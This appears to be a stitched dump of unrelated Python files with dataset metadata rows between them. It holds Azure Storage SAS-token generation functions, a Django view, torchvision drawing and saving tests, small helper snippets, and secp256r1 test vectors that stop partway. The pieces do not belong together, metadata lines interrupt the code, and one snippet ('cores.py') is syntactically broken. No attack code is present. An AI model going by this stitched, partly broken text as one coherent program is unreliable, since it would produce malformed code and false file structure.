start=None, # type: Optional[Union[datetime, str]]
ip=None, # type: Optional[str]
**kwargs # type: Any
): # type: (...) -> str
"""Generates a shared access signature for the blob service.
Use the returned signature with the credential parameter of any BlobServiceClient,
ContainerClient or BlobClient.
:param str account_name:
The storage account name used to generate the shared access signature.
:param str account_key:
The account key, also called shared key or access key, to generate the shared access signature.
:param resource_types:
Specifies the resource types that are accessible with the account SAS.
:type resource_types: str or ~azure.storage.blob.ResourceTypes
:param permission:
The permissions associated with the shared access signature. The
user is restricted to operations allowed by the permissions.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has been
specified in an associated stored access policy.
:type permission: str or ~azure.storage.blob.AccountSasPermissions
:param expiry:
The time at which the shared access signature becomes invalid.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has
been specified in an associated stored access policy. Azure will always
convert values to UTC. If a date is passed in without timezone info, it
is assumed to be UTC.
:type expiry: ~datetime.datetime or str
:param start:
The time at which the shared access signature becomes valid. If
omitted, start time for this call is assumed to be the time when the
storage service receives the request. Azure will always convert values
to UTC. If a date is passed in without timezone info, it is assumed to
be UTC.
:type start: ~datetime.datetime or str
:param str ip:
Specifies an IP address or a range of IP addresses from which to accept requests.
If the IP address from which the request originates does not match the IP address
or address range specified on the SAS token, the request is not authenticated.
For example, specifying ip=168.1.5.65 or ip=168.1.5.60-168.1.5.70 on the SAS
restricts the request to those IP addresses.
:keyword str protocol:
Specifies the protocol permitted for a request made. The default value is https.
:return: A Shared Access Signature (sas) token.
:rtype: str
.. admonition:: Example:
.. literalinclude:: ../samples/blob_samples_authentication.py
:start-after: [START create_sas_token]
:end-before: [END create_sas_token]
:language: python
:dedent: 8
:caption: Generating a shared access signature.
"""
sas = SharedAccessSignature(account_name, account_key)
return sas.generate_account(
services=Services(blob=True),
resource_types=resource_types,
permission=permission,
expiry=expiry,
start=start,
ip=ip,
**kwargs
) # type: ignore
def generate_container_sas(
account_name, # type: str
container_name, # type: str
account_key=None, # type: Optional[str]
user_delegation_key=None, # type: Optional[UserDelegationKey]
permission=None, # type: Optional[Union[ContainerSasPermissions, str]]
expiry=None, # type: Optional[Union[datetime, str]]
start=None, # type: Optional[Union[datetime, str]]
policy_id=None, # type: Optional[str]
ip=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> Any
"""Generates a shared access signature for a container.
Use the returned signature with the credential parameter of any BlobServiceClient,
ContainerClient or BlobClient.
:param str account_name:
The storage account name used to generate the shared access signature.
:param str container_name:
The name of the container.
:param str account_key:
The account key, also called shared key or access key, to generate the shared access signature.
Either `account_key` or `user_delegation_key` must be specified.
:param ~azure.storage.blob.UserDelegationKey user_delegation_key:
Instead of an account shared key, the user could pass in a user delegation key.
A user delegation key can be obtained from the service by authenticating with an AAD identity;
this can be accomplished by calling :func:`~azure.storage.blob.BlobServiceClient.get_user_delegation_key`.
When present, the SAS is signed with the user delegation key instead.
:param permission:
The permissions associated with the shared access signature. The
user is restricted to operations allowed by the permissions.
Permissions must be ordered read, write, delete, list.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has been
specified in an associated stored access policy.
:type permission: str or ~azure.storage.blob.ContainerSasPermissions
:param expiry:
The time at which the shared access signature becomes invalid.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has
been specified in an associated stored access policy. Azure will always
convert values to UTC. If a date is passed in without timezone info, it
is assumed to be UTC.
:type expiry: ~datetime.datetime or str
:param start:
The time at which the shared access signature becomes valid. If
omitted, start time for this call is assumed to be the time when the
storage service receives the request. Azure will always convert values
to UTC. If a date is passed in without timezone info, it is assumed to
be UTC.
:type start: ~datetime.datetime or str
:param str policy_id:
A unique value up to 64 characters in length that correlates to a
stored access policy. To create a stored access policy, use
:func:`~azure.storage.blob.ContainerClient.set_container_access_policy`.
:param str ip:
Specifies an IP address or a range of IP addresses from which to accept requests.
If the IP address from which the request originates does not match the IP address
or address range specified on the SAS token, the request is not authenticated.
For example, specifying ip=168.1.5.65 or ip=168.1.5.60-168.1.5.70 on the SAS
restricts the request to those IP addresses.
:keyword str protocol:
Specifies the protocol permitted for a request made. The default value is https.
:keyword str cache_control:
Response header value for Cache-Control when resource is accessed
using this shared access signature.
:keyword str content_disposition:
Response header value for Content-Disposition when resource is accessed
using this shared access signature.
:keyword str content_encoding:
Response header value for Content-Encoding when resource is accessed
using this shared access signature.
:keyword str content_language:
Response header value for Content-Language when resource is accessed
using this shared access signature.
:keyword str content_type:
Response header value for Content-Type when resource is accessed
using this shared access signature.
:return: A Shared Access Signature (sas) token.
:rtype: str
.. admonition:: Example:
.. literalinclude:: ../samples/blob_samples_containers.py
:start-after: [START generate_sas_token]
:end-before: [END generate_sas_token]
:language: python
:dedent: 12
:caption: Generating a sas token.
"""
if not user_delegation_key and not account_key:
raise ValueError("Either user_delegation_key or account_key must be provided.")
if user_delegation_key:
sas = BlobSharedAccessSignature(account_name, user_delegation_key=user_delegation_key)
else:
sas = BlobSharedAccessSignature(account_name, account_key=account_key)
return sas.generate_container(
container_name,
permission=permission,
expiry=expiry,
start=start,
policy_id=policy_id,
ip=ip,
**kwargs
)
def generate_blob_sas(
account_name, # type: str
container_name, # type: str
blob_name, # type: str
snapshot=None, # type: Optional[str]
account_key=None, # type: Optional[str]
user_delegation_key=None, # type: Optional[UserDelegationKey]
permission=None, # type: Optional[Union[BlobSasPermissions, str]]
expiry=None, # type: Optional[Union[datetime, str]]
start=None, # type: Optional[Union[datetime, str]]
policy_id=None, # type: Optional[str]
ip=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> Any
"""Generates a shared access signature for a blob.
Use the returned signature with the credential parameter of any BlobServiceClient,
ContainerClient or BlobClient.
:param str account_name:
The storage account name used to generate the shared access signature.
:param str container_name:
The name of the container.
:param str blob_name:
The name of the blob.
:param str snapshot:
An optional blob snapshot ID.
:param str account_key:
The account key, also called shared key or access key, to generate the shared access signature.
Either `account_key` or `user_delegation_key` must be specified.
:param ~azure.storage.blob.UserDelegationKey user_delegation_key:
Instead of an account shared key, the user could pass in a user delegation key.
A user delegation key can be obtained from the service by authenticating with an AAD identity;
this can be accomplished by calling :func:`~azure.storage.blob.BlobServiceClient.get_user_delegation_key`.
When present, the SAS is signed with the user delegation key instead.
:param permission:
The permissions associated with the shared access signature. The
user is restricted to operations allowed by the permissions.
Permissions must be ordered read, write, delete, list.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has been
specified in an associated stored access policy.
:type permission: str or ~azure.storage.blob.BlobSasPermissions
:param expiry:
The time at which the shared access signature becomes invalid.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has
been specified in an associated stored access policy. Azure will always
convert values to UTC. If a date is passed in without timezone info, it
is assumed to be UTC.
:type expiry: ~datetime.datetime or str
:param start:
The time at which the shared access signature becomes valid. If
omitted, start time for this call is assumed to be the time when the
storage service receives the request. Azure will always convert values
to UTC. If a date is passed in without timezone info, it is assumed to
be UTC.
:type start: ~datetime.datetime or str
:param str policy_id:
A unique value up to 64 characters in length that correlates to a
stored access policy. To create a stored access policy, use
:func:`~azure.storage.blob.ContainerClient.set_container_access_policy()`.
:param str ip:
Specifies an IP address or a range of IP addresses from which to accept requests.
If the IP address from which the request originates does not match the IP address
or address range specified on the SAS token, the request is not authenticated.
For example, specifying ip=168.1.5.65 or ip=168.1.5.60-168.1.5.70 on the SAS
restricts the request to those IP addresses.
:keyword str version_id:
An optional blob version ID. This parameter is only for versioning enabled account
.. versionadded:: 12.4.0
This keyword argument was introduced in API version '2019-12-12'.
:keyword str protocol:
Specifies the protocol permitted for a request made. The default value is https.
:keyword str cache_control:
Response header value for Cache-Control when resource is accessed
using this shared access signature.
:keyword str content_disposition:
Response header value for Content-Disposition when resource is accessed
using this shared access signature.
:keyword str content_encoding:
Response header value for Content-Encoding when resource is accessed
using this shared access signature.
:keyword str content_language:
Response header value for Content-Language when resource is accessed
using this shared access signature.
:keyword str content_type:
Response header value for Content-Type when resource is accessed
using this shared access signature.
:return: A Shared Access Signature (sas) token.
:rtype: str
"""
if not user_delegation_key and not account_key:
raise ValueError("Either user_delegation_key or account_key must be provided.")
version_id = kwargs.pop('version_id', None)
if version_id and snapshot:
raise ValueError("snapshot and version_id cannot be set at the same time.")
if user_delegation_key:
sas = BlobSharedAccessSignature(account_name, user_delegation_key=user_delegation_key)
else:
sas = BlobSharedAccessSignature(account_name, account_key=account_key)
return sas.generate_blob(
container_name,
blob_name,
snapshot=snapshot,
version_id=version_id,
permission=permission,
expiry=expiry,
start=start,
policy_id=policy_id,
ip=ip,
**kwargs
)
| 51.08547 | 119 | 0.682249 | 3,818 | 29,885 | 5.22001 | 0.083028 | 0.032514 | 0.054792 | 0.025289 | 0.811741 | 0.784496 | 0.770697 | 0.755695 | 0.727546 | 0.723583 | 0 | 0.006025 | 0.261402 | 29,885 | 584 | 120 | 51.172945 | 0.896888 | 0.631822 | 0 | 0.447368 | 0 | 0 | 0.024157 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.036842 | 0 | 0.147368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9705781cb6445084669d3cc49b1e93d430b433f | 115 | py | Python | findaridepublic/views.py | benjaminwsebastian/gidek | e24fa3b24913cb0e21512161bb31221f4422798b | [
"MIT"
] | null | null | null | findaridepublic/views.py | benjaminwsebastian/gidek | e24fa3b24913cb0e21512161bb31221f4422798b | [
"MIT"
] | 5 | 2021-03-30T14:03:51.000Z | 2021-09-22T19:29:55.000Z | findaridepublic/views.py | benjaminwsebastian/gidek | e24fa3b24913cb0e21512161bb31221f4422798b | [
"MIT"
] | null | null | null | from django.shortcuts import render
def search(request):
return render(request, 'findaridepublic/search.html') | 28.75 | 57 | 0.791304 | 14 | 115 | 6.5 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113043 | 115 | 4 | 57 | 28.75 | 0.892157 | 0 | 0 | 0 | 0 | 0 | 0.232759 | 0.232759 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
b9893cdd1acf685b6892dcee4a0efdcb229bac36 | 9,297 | py | Python | test/test_utils.py | zhangguanheng66/vision | 37eb37a836fbc2c26197dfaf76d2a3f4f39f15df | [
"BSD-3-Clause"
] | 1 | 2021-04-04T15:59:59.000Z | 2021-04-04T15:59:59.000Z | test/test_utils.py | zhangguanheng66/vision | 37eb37a836fbc2c26197dfaf76d2a3f4f39f15df | [
"BSD-3-Clause"
] | null | null | null | test/test_utils.py | zhangguanheng66/vision | 37eb37a836fbc2c26197dfaf76d2a3f4f39f15df | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import os
import sys
import tempfile
import torch
import torchvision.utils as utils
import unittest
from io import BytesIO
import torchvision.transforms.functional as F
from PIL import Image
boxes = torch.tensor([[0, 0, 20, 20], [0, 0, 0, 0],
[10, 15, 30, 35], [23, 35, 93, 95]], dtype=torch.float)
masks = torch.tensor([
[
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799],
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799],
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799],
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799]
],
[
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799],
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541]
],
[
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541],
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541],
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541],
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541],
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
]
], dtype=torch.float)
class Tester(unittest.TestCase):
def test_make_grid_not_inplace(self):
t = torch.rand(5, 3, 10, 10)
t_clone = t.clone()
utils.make_grid(t, normalize=False)
self.assertTrue(torch.equal(t, t_clone), 'make_grid modified tensor in-place')
utils.make_grid(t, normalize=True, scale_each=False)
self.assertTrue(torch.equal(t, t_clone), 'make_grid modified tensor in-place')
utils.make_grid(t, normalize=True, scale_each=True)
self.assertTrue(torch.equal(t, t_clone), 'make_grid modified tensor in-place')
def test_normalize_in_make_grid(self):
t = torch.rand(5, 3, 10, 10) * 255
norm_max = torch.tensor(1.0)
norm_min = torch.tensor(0.0)
grid = utils.make_grid(t, normalize=True)
grid_max = torch.max(grid)
grid_min = torch.min(grid)
# Rounding the result to one decimal for comparison
n_digits = 1
rounded_grid_max = torch.round(grid_max * 10 ** n_digits) / (10 ** n_digits)
rounded_grid_min = torch.round(grid_min * 10 ** n_digits) / (10 ** n_digits)
self.assertTrue(torch.equal(norm_max, rounded_grid_max), 'Normalized max is not equal to 1')
self.assertTrue(torch.equal(norm_min, rounded_grid_min), 'Normalized min is not equal to 0')
@unittest.skipIf(sys.platform in ('win32', 'cygwin'), 'temporarily disabled on Windows')
def test_save_image(self):
with tempfile.NamedTemporaryFile(suffix='.png') as f:
t = torch.rand(2, 3, 64, 64)
utils.save_image(t, f.name)
self.assertTrue(os.path.exists(f.name), 'The image is not present after save')
@unittest.skipIf(sys.platform in ('win32', 'cygwin'), 'temporarily disabled on Windows')
def test_save_image_single_pixel(self):
with tempfile.NamedTemporaryFile(suffix='.png') as f:
t = torch.rand(1, 3, 1, 1)
utils.save_image(t, f.name)
self.assertTrue(os.path.exists(f.name), 'The pixel image is not present after save')
@unittest.skipIf(sys.platform in ('win32', 'cygwin'), 'temporarily disabled on Windows')
def test_save_image_file_object(self):
with tempfile.NamedTemporaryFile(suffix='.png') as f:
t = torch.rand(2, 3, 64, 64)
utils.save_image(t, f.name)
img_orig = Image.open(f.name)
fp = BytesIO()
utils.save_image(t, fp, format='png')
img_bytes = Image.open(fp)
self.assertTrue(torch.equal(F.to_tensor(img_orig), F.to_tensor(img_bytes)),
'Image not stored in file object')
@unittest.skipIf(sys.platform in ('win32', 'cygwin'), 'temporarily disabled on Windows')
def test_save_image_single_pixel_file_object(self):
with tempfile.NamedTemporaryFile(suffix='.png') as f:
t = torch.rand(1, 3, 1, 1)
utils.save_image(t, f.name)
img_orig = Image.open(f.name)
fp = BytesIO()
utils.save_image(t, fp, format='png')
img_bytes = Image.open(fp)
self.assertTrue(torch.equal(F.to_tensor(img_orig), F.to_tensor(img_bytes)),
'Pixel Image not stored in file object')
def test_draw_boxes(self):
img = torch.full((3, 100, 100), 255, dtype=torch.uint8)
img_cp = img.clone()
boxes_cp = boxes.clone()
labels = ["a", "b", "c", "d"]
colors = ["green", "#FF00FF", (0, 255, 0), "red"]
result = utils.draw_bounding_boxes(img, boxes, labels=labels, colors=colors, fill=True)
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets", "fakedata", "draw_boxes_util.png")
if not os.path.exists(path):
res = Image.fromarray(result.permute(1, 2, 0).contiguous().numpy())
res.save(path)
expected = torch.as_tensor(np.array(Image.open(path))).permute(2, 0, 1)
self.assertTrue(torch.equal(result, expected))
# Check if modification is not in place
self.assertTrue(torch.all(torch.eq(boxes, boxes_cp)).item())
self.assertTrue(torch.all(torch.eq(img, img_cp)).item())
def test_draw_boxes_vanilla(self):
img = torch.full((3, 100, 100), 0, dtype=torch.uint8)
img_cp = img.clone()
boxes_cp = boxes.clone()
result = utils.draw_bounding_boxes(img, boxes, fill=False, width=7)
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets", "fakedata", "draw_boxes_vanilla.png")
if not os.path.exists(path):
res = Image.fromarray(result.permute(1, 2, 0).contiguous().numpy())
res.save(path)
expected = torch.as_tensor(np.array(Image.open(path))).permute(2, 0, 1)
self.assertTrue(torch.equal(result, expected))
# Check if modification is not in place
self.assertTrue(torch.all(torch.eq(boxes, boxes_cp)).item())
self.assertTrue(torch.all(torch.eq(img, img_cp)).item())
def test_draw_invalid_boxes(self):
img_tp = ((1, 1, 1), (1, 2, 3))
img_wrong1 = torch.full((3, 5, 5), 255, dtype=torch.float)
img_wrong2 = torch.full((1, 3, 5, 5), 255, dtype=torch.uint8)
boxes = torch.tensor([[0, 0, 20, 20], [0, 0, 0, 0],
[10, 15, 30, 35], [23, 35, 93, 95]], dtype=torch.float)
self.assertRaises(TypeError, utils.draw_bounding_boxes, img_tp, boxes)
self.assertRaises(ValueError, utils.draw_bounding_boxes, img_wrong1, boxes)
self.assertRaises(ValueError, utils.draw_bounding_boxes, img_wrong2, boxes)
def test_draw_segmentation_masks_colors(self):
img = torch.full((3, 5, 5), 255, dtype=torch.uint8)
img_cp = img.clone()
masks_cp = masks.clone()
colors = ["#FF00FF", (0, 255, 0), "red"]
result = utils.draw_segmentation_masks(img, masks, colors=colors)
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets",
"fakedata", "draw_segm_masks_colors_util.png")
if not os.path.exists(path):
res = Image.fromarray(result.permute(1, 2, 0).contiguous().numpy())
res.save(path)
expected = torch.as_tensor(np.array(Image.open(path))).permute(2, 0, 1)
self.assertTrue(torch.equal(result, expected))
# Check if modification is not in place
self.assertTrue(torch.all(torch.eq(img, img_cp)).item())
self.assertTrue(torch.all(torch.eq(masks, masks_cp)).item())
def test_draw_segmentation_masks_no_colors(self):
img = torch.full((3, 20, 20), 255, dtype=torch.uint8)
img_cp = img.clone()
masks_cp = masks.clone()
result = utils.draw_segmentation_masks(img, masks, colors=None)
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets",
"fakedata", "draw_segm_masks_no_colors_util.png")
if not os.path.exists(path):
res = Image.fromarray(result.permute(1, 2, 0).contiguous().numpy())
res.save(path)
expected = torch.as_tensor(np.array(Image.open(path))).permute(2, 0, 1)
self.assertTrue(torch.equal(result, expected))
# Check if modification is not in place
self.assertTrue(torch.all(torch.eq(img, img_cp)).item())
self.assertTrue(torch.all(torch.eq(masks, masks_cp)).item())
def test_draw_invalid_masks(self):
img_tp = ((1, 1, 1), (1, 2, 3))
img_wrong1 = torch.full((3, 5, 5), 255, dtype=torch.float)
img_wrong2 = torch.full((1, 3, 5, 5), 255, dtype=torch.uint8)
img_wrong3 = torch.full((4, 5, 5), 255, dtype=torch.uint8)
self.assertRaises(TypeError, utils.draw_segmentation_masks, img_tp, masks)
self.assertRaises(ValueError, utils.draw_segmentation_masks, img_wrong1, masks)
self.assertRaises(ValueError, utils.draw_segmentation_masks, img_wrong2, masks)
self.assertRaises(ValueError, utils.draw_segmentation_masks, img_wrong3, masks)
if __name__ == '__main__':
unittest.main()
| 44.483254 | 119 | 0.613961 | 1,344 | 9,297 | 4.106399 | 0.120536 | 0.022649 | 0.026092 | 0.043486 | 0.85251 | 0.811016 | 0.777496 | 0.758833 | 0.723863 | 0.670955 | 0 | 0.086694 | 0.234484 | 9,297 | 208 | 120 | 44.697115 | 0.688773 | 0.02162 | 0 | 0.547619 | 0 | 0 | 0.076898 | 0.009571 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.071429 | false | 0 | 0.059524 | 0 | 0.136905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9e06ba2fe6a186870528ca52691c63cd5890d0c | 35 | py | Python | cores.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | cores.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | cores.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | vermelho='\033[0;30;41m
fim=\033[m' | 17.5 | 23 | 0.685714 | 8 | 35 | 3 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.323529 | 0.028571 | 35 | 2 | 24 | 17.5 | 0.382353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9eb2aa4e4548291c813b9e418fe0d469833c8de | 179 | py | Python | common/strings.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | common/strings.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | common/strings.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null |
import random as random_lib
import string
def random(length=8, chars=string.ascii_letters + string.digits):
return ''.join(random_lib.choice(chars) for _ in range(length))
| 22.375 | 67 | 0.759777 | 27 | 179 | 4.888889 | 0.666667 | 0.136364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 0.134078 | 179 | 7 | 68 | 25.571429 | 0.845161 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
b9f52a3d61b7633caed221f498a4cd586fc87066 | 263 | py | Python | Metrics/code/accuracy_score.py | TannerGilbert/Machine-Learning-Explained | 5309f44a38ce862f3f177e8d5de2e60eea44637b | [
"MIT"
] | 24 | 2020-09-14T18:55:13.000Z | 2022-03-22T22:14:30.000Z | Metrics/code/accuracy_score.py | TannerGilbert/Machine-Learning-Explained | 5309f44a38ce862f3f177e8d5de2e60eea44637b | [
"MIT"
] | null | null | null | Metrics/code/accuracy_score.py | TannerGilbert/Machine-Learning-Explained | 5309f44a38ce862f3f177e8d5de2e60eea44637b | [
"MIT"
] | 6 | 2021-02-06T15:34:27.000Z | 2022-01-31T23:16:07.000Z | import numpy as np
class Accuracy:
def __call__(self, y: np.ndarray, y_pred: np.ndarray) -> np.float64:
return self.loss(y, y_pred)
def loss(self, y: np.ndarray, y_pred: np.ndarray) -> np.float64:
return np.sum(y == y_pred) / y.shape[0] | 29.222222 | 72 | 0.638783 | 45 | 263 | 3.555556 | 0.4 | 0.225 | 0.0875 | 0.175 | 0.5375 | 0.5375 | 0.5375 | 0.5375 | 0.5375 | 0.5375 | 0 | 0.024272 | 0.21673 | 263 | 9 | 73 | 29.222222 | 0.752427 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.166667 | 0.333333 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
dbdf21bfca5127059a51711599cea420d79d6972 | 23 | py | Python | core/forms/__init__.py | jeffersonkr/drink_flow_control | 7dc6d97bce6110b34d309fa61079385e6f3efde5 | [
"MIT"
] | null | null | null | core/forms/__init__.py | jeffersonkr/drink_flow_control | 7dc6d97bce6110b34d309fa61079385e6f3efde5 | [
"MIT"
] | 1 | 2022-02-10T08:42:42.000Z | 2022-02-10T08:42:42.000Z | core/forms/__init__.py | jeffersonkr/drink_flow_control | 7dc6d97bce6110b34d309fa61079385e6f3efde5 | [
"MIT"
] | null | null | null | from . import user_form | 23 | 23 | 0.826087 | 4 | 23 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 23 | 1 | 23 | 23 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dbf5d56657d994117084de59beb19f3813d40bd2 | 10,967 | py | Python | tests/ecdsa/secp256r1_test.py | jaschadub/pycoin | 1e8d0d9fe20ce0347b97847bb529cd1bd84c7442 | [
"MIT"
] | 1,210 | 2015-01-02T13:36:28.000Z | 2022-03-30T00:52:22.000Z | tests/ecdsa/secp256r1_test.py | impactog/pycoin | 3db6f82afa3054d8d07caca4909e1aed3de2fceb | [
"MIT"
] | 280 | 2015-01-05T23:16:47.000Z | 2022-02-22T22:02:17.000Z | tests/ecdsa/secp256r1_test.py | impactog/pycoin | 3db6f82afa3054d8d07caca4909e1aed3de2fceb | [
"MIT"
] | 459 | 2015-01-10T00:15:57.000Z | 2022-03-16T12:04:40.000Z | import unittest
from pycoin.ecdsa.secp256r1 import secp256r1_generator
VECTORS = """
k = 1
x = 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
y = 4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5
k = 2
x = 7CF27B188D034F7E8A52380304B51AC3C08969E277F21B35A60B48FC47669978
y = 07775510DB8ED040293D9AC69F7430DBBA7DADE63CE982299E04B79D227873D1
k = 3
x = 5ECBE4D1A6330A44C8F7EF951D4BF165E6C6B721EFADA985FB41661BC6E7FD6C
y = 8734640C4998FF7E374B06CE1A64A2ECD82AB036384FB83D9A79B127A27D5032
k = 4
x = E2534A3532D08FBBA02DDE659EE62BD0031FE2DB785596EF509302446B030852
y = E0F1575A4C633CC719DFEE5FDA862D764EFC96C3F30EE0055C42C23F184ED8C6
k = 5
x = 51590B7A515140D2D784C85608668FDFEF8C82FD1F5BE52421554A0DC3D033ED
y = E0C17DA8904A727D8AE1BF36BF8A79260D012F00D4D80888D1D0BB44FDA16DA4
k = 6
x = B01A172A76A4602C92D3242CB897DDE3024C740DEBB215B4C6B0AAE93C2291A9
y = E85C10743237DAD56FEC0E2DFBA703791C00F7701C7E16BDFD7C48538FC77FE2
k = 7
x = 8E533B6FA0BF7B4625BB30667C01FB607EF9F8B8A80FEF5B300628703187B2A3
y = 73EB1DBDE03318366D069F83A6F5900053C73633CB041B21C55E1A86C1F400B4
k = 8
x = 62D9779DBEE9B0534042742D3AB54CADC1D238980FCE97DBB4DD9DC1DB6FB393
y = AD5ACCBD91E9D8244FF15D771167CEE0A2ED51F6BBE76A78DA540A6A0F09957E
k = 9
x = EA68D7B6FEDF0B71878938D51D71F8729E0ACB8C2C6DF8B3D79E8A4B90949EE0
y = 2A2744C972C9FCE787014A964A8EA0C84D714FEAA4DE823FE85A224A4DD048FA
k = 10
x = CEF66D6B2A3A993E591214D1EA223FB545CA6C471C48306E4C36069404C5723F
y = 878662A229AAAE906E123CDD9D3B4C10590DED29FE751EEECA34BBAA44AF0773
k = 11
x = 3ED113B7883B4C590638379DB0C21CDA16742ED0255048BF433391D374BC21D1
y = 9099209ACCC4C8A224C843AFA4F4C68A090D04DA5E9889DAE2F8EEFCE82A3740
k = 12
x = 741DD5BDA817D95E4626537320E5D55179983028B2F82C99D500C5EE8624E3C4
y = 0770B46A9C385FDC567383554887B1548EEB912C35BA5CA71995FF22CD4481D3
k = 13
x = 177C837AE0AC495A61805DF2D85EE2FC792E284B65EAD58A98E15D9D46072C01
y = 63BB58CD4EBEA558A24091ADB40F4E7226EE14C3A1FB4DF39C43BBE2EFC7BFD8
k = 14
x = 54E77A001C3862B97A76647F4336DF3CF126ACBE7A069C5E5709277324D2920B
y = F599F1BB29F4317542121F8C05A2E7C37171EA77735090081BA7C82F60D0B375
k = 15
x = F0454DC6971ABAE7ADFB378999888265AE03AF92DE3A0EF163668C63E59B9D5F
y = B5B93EE3592E2D1F4E6594E51F9643E62A3B21CE75B5FA3F47E59CDE0D034F36
k = 16
x = 76A94D138A6B41858B821C629836315FCD28392EFF6CA038A5EB4787E1277C6E
y = A985FE61341F260E6CB0A1B5E11E87208599A0040FC78BAA0E9DDD724B8C5110
k = 17
